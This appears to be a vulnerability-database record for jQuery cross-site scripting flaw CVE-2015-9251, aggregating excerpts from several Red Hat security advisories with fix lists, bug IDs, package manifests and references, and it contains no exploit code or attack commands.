id: "160274", }, ], trust: 0.3, }, }
var-201801-0036
Vulnerability from variot
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed. jQuery contains a cross-site scripting vulnerability. Information may be obtained and information may be tampered with. jQuery is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Versions prior to jQuery 3.0.0 are vulnerable. Upgrading to jQuery 3.0.0 or later, or setting an explicit dataType on cross-domain Ajax requests, removes the condition described above. jQuery is an open source, cross-browser JavaScript library developed by American programmer John Resig. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. The vulnerability stems from the lack of correct validation of client data in web applications. An attacker could exploit this vulnerability to execute client code. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001 JBEAP-23865 - GSS Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001 JBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001 JBEAP-23928 - Tracker bug for the EAP 7.4.9 release for RHEL-9 JBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001 JBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001 JBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001 JBEAP-24100 - GSS Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001 JBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value JBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001 JBEAP-24132 - GSS Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001 JBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001 JBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002 JBEAP-24191 - GSS Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001 JBEAP-24195 - GSS Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001 JBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003 JBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2 JBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001 JBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001
- Description:
Red Hat Fuse provides a small-footprint, flexible, open source enterprise service bus and integration platform. Red Hat A-MQ is a standards compliant messaging system that is tailored for use in mission critical applications. It includes bug fixes, which are documented in the patch notes accompanying the package on the download page. See the download link given in the references section below. Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
Installation instructions are located in the download section of the customer portal.
The References section of this erratum contains a download link (you must log in to download the update). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: idm:DL1 and idm:client security, bug fix, and enhancement update Advisory ID: RHSA-2020:4670-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:4670 Issue date: 2020-11-03 CVE Names: CVE-2015-9251 CVE-2016-10735 CVE-2018-14040 CVE-2018-14042 CVE-2018-20676 CVE-2018-20677 CVE-2019-8331 CVE-2019-11358 CVE-2020-1722 CVE-2020-11022 ==================================================================== 1. Summary:
An update for the idm:DL1 and idm:client modules is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64
- Description:
Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments.
The following packages have been upgraded to a later upstream version: ipa (4.8.7), softhsm (2.6.0), opendnssec (2.1.6). (BZ#1759888, BZ#1818765, BZ#1818877)
Security Fix(es):
- js-jquery: Cross-site scripting via cross-domain ajax requests (CVE-2015-9251)
- bootstrap: XSS in the data-target attribute (CVE-2016-10735)
- bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute (CVE-2018-14040)
- bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip (CVE-2018-14042)
- bootstrap: XSS in the tooltip data-viewport attribute (CVE-2018-20676)
- bootstrap: XSS in the affix configuration target property (CVE-2018-20677)
- bootstrap: XSS in the tooltip or popover data-template attribute (CVE-2019-8331)
- js-jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection (CVE-2019-11358)
- jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022)
- ipa: No password length restriction leads to denial of service (CVE-2020-1722)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.3 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1430365 - [RFE] Host-group names command rename 1488732 - fake_mname in named.conf is no longer effective 1585020 - Enable compat tree to provide information about AD users and groups on trust agents 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1651577 - [WebUI] IPA Error 3007: RequirmentError" while adding members in "User ID overrides" tab 1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute 1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1701233 - [RFE] support setting supported signature methods on the token 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1746830 - Memory leak during search of idview overrides 1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch 1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming 1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn't work in GUI (it works only from CLI) 1759888 - Rebase OpenDNSSEC to 2.1 1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED 1777806 - When Service weight is set as 0 for server in IPA location "IPA Error 903: InternalError" is displayed 1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service 1801698 - [RFE] Changing default hostgroup is too easy 1802471 - SELinux policy for ipa-custodia 1809835 - RFE: ipa group-add-member: number of failed should also be emphasized 1810154 - RFE: ipa-backup should compare locally and 
globally installed server roles 1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time 1813330 - ipa-restore does not restart httpd 1816784 - KRA install fails if all KRA members are Hidden Replicas 1818765 - [Rebase] Rebase ipa to 4.8.6+ 1818877 - [Rebase] Rebase to softhsm 2.6.0+ 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1831732 - AVC avc: denied { dac_override } for comm="ods-enforcerd 1831935 - AD authentication with IdM against SQL Server 1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11 1833266 - [dirsrv] set 'nsslapd-enable-upgrade-hash: off' as this raises warnings 1834264 - BIND rebase: rebuild against new so version 1834909 - softhsm use-after-free on process exit 1845211 - Rebase bind-dyndb-ldap to 11.3 1845537 - IPA bind configuration issue 1845596 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts 1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7 1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn 1849914 - FreeIPA - Utilize 256-bit AJP connector passwords 1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition 1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2 1853263 - ipa-selinux package missing 1857157 - replica install failing with avc denial for custodia component 1858318 - AttributeError: module 'ssl' has no attribute 'SSLCertVerificationError' when upgrading ca-less ipa master 1859213 - AVC denial during ipa-adtrust-install --add-agents 1863079 - ipa-epn command displays 'exception: ConnectionRefusedError: [Errno 111] Connection refused' 1863616 - CA-less install does not set required permissions on KDC certificate 1866291 - EPN: enhance input validation 1866938 - ipa-epn fails to retrieve user data if some 
user attributes are not present 1868432 - Unhandled Python exception in '/usr/libexec/ipa/ipa-pki-retrieve-key' 1869311 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less 1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain 1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. 1879604 - pkispawn logs files are empty
- Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source: bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.src.rpm custodia-0.6.0-3.module+el8.1.0+4098+f286395e.src.rpm ipa-4.8.7-12.module+el8.3.0+8222+c1bff54a.src.rpm ipa-4.8.7-12.module+el8.3.0+8223+6212645f.src.rpm ipa-healthcheck-0.4-6.module+el8.3.0+7710+e2408ce4.src.rpm ipa-healthcheck-0.4-6.module+el8.3.0+7711+c4441980.src.rpm opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.src.rpm python-jwcrypto-0.5.0-1.module+el8.1.0+4098+f286395e.src.rpm python-jwcrypto-0.5.0-1.module+el8.1.0+4107+4a66eb87.src.rpm python-kdcproxy-0.4-5.module+el8.2.0+4691+a05b2456.src.rpm python-qrcode-5.1-12.module+el8.1.0+4098+f286395e.src.rpm python-qrcode-5.1-12.module+el8.1.0+4107+4a66eb87.src.rpm python-yubico-1.3.2-9.module+el8.1.0+4098+f286395e.src.rpm python-yubico-1.3.2-9.module+el8.1.0+4107+4a66eb87.src.rpm pyusb-1.0.0-9.module+el8.1.0+4098+f286395e.src.rpm pyusb-1.0.0-9.module+el8.1.0+4107+4a66eb87.src.rpm slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.src.rpm softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.src.rpm
aarch64: bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm bind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm bind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm ipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm ipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm opendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm opendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm slapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm slapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm softhsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm softhsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm softhsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm
noarch: custodia-0.6.0-3.module+el8.1.0+4098+f286395e.noarch.rpm ipa-client-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm ipa-client-common-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm ipa-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm ipa-common-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm ipa-healthcheck-0.4-6.module+el8.3.0+7710+e2408ce4.noarch.rpm ipa-healthcheck-core-0.4-6.module+el8.3.0+7710+e2408ce4.noarch.rpm ipa-healthcheck-core-0.4-6.module+el8.3.0+7711+c4441980.noarch.rpm ipa-python-compat-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm ipa-python-compat-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm ipa-selinux-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm ipa-selinux-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm ipa-server-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm ipa-server-dns-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm python3-custodia-0.6.0-3.module+el8.1.0+4098+f286395e.noarch.rpm python3-ipaclient-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm python3-ipaclient-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm python3-ipalib-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm python3-ipalib-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm python3-ipaserver-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm python3-jwcrypto-0.5.0-1.module+el8.1.0+4098+f286395e.noarch.rpm python3-jwcrypto-0.5.0-1.module+el8.1.0+4107+4a66eb87.noarch.rpm python3-kdcproxy-0.4-5.module+el8.2.0+4691+a05b2456.noarch.rpm python3-pyusb-1.0.0-9.module+el8.1.0+4098+f286395e.noarch.rpm python3-pyusb-1.0.0-9.module+el8.1.0+4107+4a66eb87.noarch.rpm python3-qrcode-5.1-12.module+el8.1.0+4098+f286395e.noarch.rpm python3-qrcode-5.1-12.module+el8.1.0+4107+4a66eb87.noarch.rpm python3-qrcode-core-5.1-12.module+el8.1.0+4098+f286395e.noarch.rpm python3-qrcode-core-5.1-12.module+el8.1.0+4107+4a66eb87.noarch.rpm python3-yubico-1.3.2-9.module+el8.1.0+4098+f286395e.noarch.rpm python3-yubico-1.3.2-9.module+el8.1.0+4107+4a66eb87.noarch.rpm
ppc64le: bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm bind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm bind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm ipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm ipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm opendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm opendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm slapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm slapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm softhsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm softhsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm softhsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm
s390x: bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm bind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm bind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm ipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm ipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm opendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm opendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm slapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm slapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm softhsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm softhsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm softhsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm
x86_64: bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm bind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm bind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm ipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm ipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm opendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm opendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm slapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm slapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm softhsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm softhsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm softhsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-9251 https://access.redhat.com/security/cve/CVE-2016-10735 https://access.redhat.com/security/cve/CVE-2018-14040 https://access.redhat.com/security/cve/CVE-2018-14042 https://access.redhat.com/security/cve/CVE-2018-20676 https://access.redhat.com/security/cve/CVE-2018-20677 https://access.redhat.com/security/cve/CVE-2019-8331 https://access.redhat.com/security/cve/CVE-2019-11358 https://access.redhat.com/security/cve/CVE-2020-1722 https://access.redhat.com/security/cve/CVE-2020-11022 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX6I0xtzjgjWX9erEAQioFw/+IiVoE8tPMkiNgSNrk05OezzG/Cev8wXY mTJ+clSxujruzDZ1GyYz5Ua5v4+fwEHbTKVHiite3HKbYGgV9E5H9Y/JVR75rbPN mIfAOLmvYDp3JeHT3RBqRrtviz2UaWRTmE8E30EoC0C912w0NHpwS3fhuRmJov1X lflTtWlQCuPE/7yFQEZqYYjmKMqAVeDk4K6smM/aTzMyM+uFgaksiSTrLzU0mcHJ AAn9h59qlwUXNGRbyBCoLMJrKq5Sw1+xz518XIIjJOQDJbSqu8syzKgi/qSFuLRp 2c/OSKJ98CVoiCcyhsBW/c3B6eoDmSfeKqt6JwVH/Sva+d7Oj5vpWTB5GW4hDFFh t3cuhvyavPnyAzxRnYw5syn/RTyjaOK1U6+6SbEtJVnlx9+FW0lKs/Pcx2ocYmfO UCDXHgxmEP8DTKwJZyIZtybVkpqbXh6jf69NLROTTZMtEwJzE1NGG4ulcl6tutTq S0gchuiUuxItZlD3a9ISBXXxV0iqqd7I5p78maohzIwfyZR13S++rFt7JnoVb7SO DECfEs6VinGH0Z0YInceF6Y9N+SURBrcQpQK12/wtGSChFFU83FII2sxy6iG7pTF HPTzByu+aYgFpuEF4EKSrDlZCVJ8Es5lyp+cF401o3oGJuNo9WYScKjb51a0+SLJ zbmM3GoiGZI=QyyK -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Security Fix(es):
- HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)
- HTTP/2: flood using PRIORITY frames results in excessive resource consumption (CVE-2019-9513)
- HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)
- HTTP/2: flood using SETTINGS frames results in unbounded memory growth (CVE-2019-9515)
- HTTP/2: 0-length headers lead to denial of service (CVE-2019-9516)
- HTTP/2: request for large response leads to denial of service (CVE-2019-9517)
- HTTP/2: flood using empty frames results in excessive resource consumption (CVE-2019-9518)
- infinispan: invokeAccessibly method from ReflectionUtil class allows to invoke private methods (CVE-2019-10174)
- spring-security-core: mishandling of user passwords allows logging in with a password of NULL (CVE-2019-11272)
- jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution (CVE-2019-12384)
- jackson-databind: default typing mishandling leading to remote code execution (CVE-2019-14379)
- xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response (CVE-2019-17570)
- js-jquery: Cross-site scripting via cross-domain ajax requests (CVE-2015-9251)
- logback: Serialization vulnerability in SocketServer and ServerSocketReceiver (CVE-2017-5929)
- js-jquery: XSS in responses from cross-origin ajax requests (CVE-2017-16012)
- apache-commons-compress: ZipArchiveInputStream.read() fails to identify correct EOF allowing for DoS via crafted zip (CVE-2018-11771)
- spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher (CVE-2019-3802)
- undertow: leak credentials to log files UndertowLogger.REQUEST_LOGGER.undertowRequestFailed (CVE-2019-3888)
- shiro: Cookie padding oracle vulnerability with default configuration (CVE-2019-12422)
- jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server via crafted JSON message.
1725807 - CVE-2019-12384 jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution
1728993 - CVE-2019-11272 spring-security-core: mishandling of user passwords allows logging in with a password of NULL
1730316 - CVE-2019-3802 spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher
1735645 - CVE-2019-9512 HTTP/2: flood using PING frames results in unbounded memory growth
1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption
1735744 - CVE-2019-9514 HTTP/2: flood using HEADERS frames results in unbounded memory growth
1735745 - CVE-2019-9515 HTTP/2: flood using SETTINGS frames results in unbounded memory growth
1735749 - CVE-2019-9518 HTTP/2: flood using empty frames results in excessive resource consumption
1737517 - CVE-2019-14379 jackson-databind: default typing mishandling leading to remote code execution
1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service
1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service
1752962 - CVE-2019-14439 jackson-databind: Polymorphic typing issue related to logback/JNDI
1774726 - CVE-2019-12422 shiro: Cookie padding oracle vulnerability with default configuration
1775193 - CVE-2019-17570 xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response
5
